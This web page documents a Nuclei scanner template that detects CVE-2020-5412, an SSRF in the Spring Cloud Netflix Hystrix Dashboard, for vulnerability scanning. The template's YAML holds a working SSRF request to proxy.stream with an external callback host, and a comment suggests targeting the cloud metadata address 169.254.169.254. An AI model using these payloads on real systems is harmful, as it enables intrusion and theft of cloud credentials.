Spring Cloud Netflix - Server-Side Request Forgery
ID: CVE-2020-5412
Severity: medium
Author: dwisiswant0
Tags: cve,cve2020,ssrf,springcloud,vmware
Description
Section titled “Description”Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2020-5412
info: name: Spring Cloud Netflix - Server-Side Request Forgery author: dwisiswant0 severity: medium description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. impact: | The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation. remediation: | Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability. reference: - https://tanzu.vmware.com/security/cve-2020-5412 - https://nvd.nist.gov/vuln/detail/CVE-2020-5412 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/pen4uin/awesome-vulnerability-research classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-5412 cwe-id: CWE-610,CWE-441 epss-score: 0.05469 epss-percentile: 0.93009 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware product: spring_cloud_netflix tags: cve,cve2020,ssrf,springcloud,vmware
http: - method: GET path: - "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: header words: - "Jelly"
- type: status status: - 200
# To get crithit, try http://169.254.169.254/latest/metadata/# digest: 4a0a00473045022100a345439eb541558a96a4c756dfcfa72c3cf29d2528aedfb90c5a34a5fb3ab7b6022052cdaeb91c3f9a669e4d3d158cd41aa53e7df6276f888955e8379d1d69c0557d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-5412.yaml"